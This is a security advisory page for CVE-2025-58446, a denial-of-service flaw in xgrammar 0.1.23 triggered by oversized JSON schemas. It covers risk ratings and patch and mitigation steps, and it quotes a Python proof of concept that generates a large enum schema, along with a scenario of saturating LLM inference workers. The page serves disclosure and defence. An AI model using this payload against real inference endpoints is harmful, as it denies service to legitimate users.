CVE-2025-58446: xgrammar: DoS via oversized JSON schema grammar parsing

GHSA-9q5r-wfvf-rr7f MEDIUM PoC AVAILABLE CISA: TRACK*
Published September 5, 2025
CISO Take

xgrammar v0.1.23 has a DoS vulnerability where crafted large JSON schemas (>100k chars) trigger a pathologically slow grammar optimizer, blocking model inference for minutes per request. Any model serving endpoint that accepts user-defined JSON schemas for constrained/structured output is directly exploitable with a trivial PoC. Patch to v0.1.24 immediately; if delayed, enforce schema byte-size limits at the API gateway before requests reach the inference layer.

What is the risk?

Effective risk is medium-high for exposed inference endpoints, despite the medium CVSS. The attack surface is any API that accepts caller-supplied JSON schemas for structured generation — a common pattern in agentic and enterprise LLM deployments. EPSS is very low (0.00091), suggesting no current active exploitation, but the PoC is fully public and requires zero AI/ML expertise to execute. Impact is availability, not confidentiality — a single malicious request can monopolize an inference thread for minutes, enabling throughput starvation against multi-tenant or high-availability deployments.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
XGrammar pip = 0.1.23 0.1.24
1.8K 160 dependents Pushed 12d ago 100% patched ~5d to patch Full package profile →

Do you use XGrammar? You're affected.

How severe is it?

CVSS 3.1
N/A
EPSS
0.5%
chance of exploitation in 30 days
Higher than 38% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What should I do?

5 steps
  1. Patch

    Upgrade xgrammar to v0.1.24 or later — the fix optimizes the grammar optimizer and disables slow paths for large grammars.

  2. Short-term workaround

    Enforce a maximum schema size limit (e.g., 50KB) at the API gateway or application layer before calling Grammar.from_json_schema().

  3. Rate limiting

    Apply per-client rate limiting on constrained generation endpoints, independent of token-based limits.

  4. Detection

    Alert on grammar parsing durations exceeding 10 seconds — this is anomalous and indicative of exploitation.

  5. Audit exposure

    Identify all internal services or APIs that accept caller-supplied JSON schemas and pass them directly to xgrammar without validation.

What does CISA's SSVC say?

Decision Track*
Exploitation poc
Automatable Yes
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.2.6 - AI system operation and monitoring A.8.4 - AI system resources
NIST AI RMF
MANAGE-2.4 - Risks and benefits of the AI system are communicated to relevant AI actors MEASURE-2.5 - AI system to be deployed satisfies its requirements for availability
OWASP LLM Top 10
LLM04 - Model Denial of Service

Frequently Asked Questions

What is CVE-2025-58446?

xgrammar v0.1.23 has a DoS vulnerability where crafted large JSON schemas (>100k chars) trigger a pathologically slow grammar optimizer, blocking model inference for minutes per request. Any model serving endpoint that accepts user-defined JSON schemas for constrained/structured output is directly exploitable with a trivial PoC. Patch to v0.1.24 immediately; if delayed, enforce schema byte-size limits at the API gateway before requests reach the inference layer.

Is CVE-2025-58446 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-58446, increasing the risk of exploitation.

How to fix CVE-2025-58446?

1. **Patch**: Upgrade xgrammar to v0.1.24 or later — the fix optimizes the grammar optimizer and disables slow paths for large grammars. 2. **Short-term workaround**: Enforce a maximum schema size limit (e.g., 50KB) at the API gateway or application layer before calling Grammar.from_json_schema(). 3. **Rate limiting**: Apply per-client rate limiting on constrained generation endpoints, independent of token-based limits. 4. **Detection**: Alert on grammar parsing durations exceeding 10 seconds — this is anomalous and indicative of exploitation. 5. **Audit exposure**: Identify all internal services or APIs that accept caller-supplied JSON schemas and pass them directly to xgrammar without validation.

What systems are affected by CVE-2025-58446?

This vulnerability affects the following AI/ML architecture patterns: model serving, structured output pipelines, LLM inference APIs, agentic tool-calling pipelines.

What is the CVSS score for CVE-2025-58446?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

model servingstructured output pipelinesLLM inference APIsagentic tool-calling pipelines

MITRE ATLAS Techniques

AML.T0029 Denial of AI Service
AML.T0034 Cost Harvesting
AML.T0049 Exploit Public-Facing Application

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.6.2.6, A.8.4
NIST AI RMF: MANAGE-2.4, MEASURE-2.5
OWASP LLM Top 10: LLM04

What are the technical details?

Original Advisory

### Summary Provided grammar, would fit in a context window of most of the models, but takes minutes to process in 0.1.23. In testing with 0.1.16 the parser worked fine so this seems to be a regression caused by Earley parser. ### Details Full reproducer provider in the POC section. The resulting grammar is around 70k tokens, and the grammar parsing itself (with the models I checked) was significantly longer than LLM processing itself, meaning this can be used to DOS model providers. ### Patch This problem is caused by the grammar optimizer introduced in v0.1.23 being too slow. It only happens for very large grammars (>100k characters), like the below one. v0.1.24 solved this problem by optimizing the speed of the grammar optimizer and disable some slow optimization for large grammars. Thanks to @Seven-Streams ### PoC ``` import string import random def enum_schema(size=10000,str_len=10): enum = {"enum": ["".join(random.choices(string.ascii_uppercase, k=str_len)) for _ in range(size)]} schema = { "definitions": { "colorEnum": enum }, "type": "object", "properties": { "color1": { "$ref": "#/definitions/colorEnum" }, "color2": { "$ref": "#/definitions/colorEnum" }, "color3": { "$ref": "#/definitions/colorEnum" }, "color4": { "$ref": "#/definitions/colorEnum" }, "color5": { "$ref": "#/definitions/colorEnum" }, "color6": { "$ref": "#/definitions/colorEnum" }, "color7": { "$ref": "#/definitions/colorEnum" }, "color8": { "$ref": "#/definitions/colorEnum" } }, "required": [ "color1", "color2" ] } return schema schema_enum = enum_schema() print(schema_enum) print(test_schema(schema_enum, {})) ``` where: ``` def test_schema(schema, instance): grammar = xgr.Grammar.from_json_schema( json.dumps(schema), strict_mode=True ) return _is_grammar_accept_string(grammar, json.dumps(instance)) ``` ### Impact DOS

Exploitation Scenario

An adversary targeting a multi-tenant LLM API (e.g., an enterprise copilot or structured data extraction service) crafts a JSON schema with thousands of enum values totaling over 100k characters — trivially generated with the public PoC. They submit this as the response_format schema in a constrained generation request. The xgrammar optimizer enters a slow computation path, blocking the inference thread for several minutes. By issuing a small number of concurrent requests (5–10), the attacker can saturate all inference workers, causing complete service unavailability for legitimate users. The attack costs pennies in compute and requires no authentication bypass or specialized knowledge, only awareness of the library version and the public PoC.

Weaknesses (CWE)

CWE-770 — Allocation of Resources Without Limits or Throttling: The product allocates a reusable resource or group of resources on behalf of an actor without imposing any intended restrictions on the size or number of resources that can be allocated.

  • [Requirements] Clearly specify the minimum and maximum expectations for capabilities, and dictate which behaviors are acceptable when resource allocation reaches limits.
  • [Architecture and Design] Limit the amount of resources that are accessible to unprivileged users. Set per-user limits for resources. Allow the system administrator to define these limits. Be careful to avoid CWE-410.

Source: MITRE CWE corpus.

Timeline

Published
September 5, 2025
Last Modified
September 10, 2025
First Seen
March 24, 2026

Related Vulnerabilities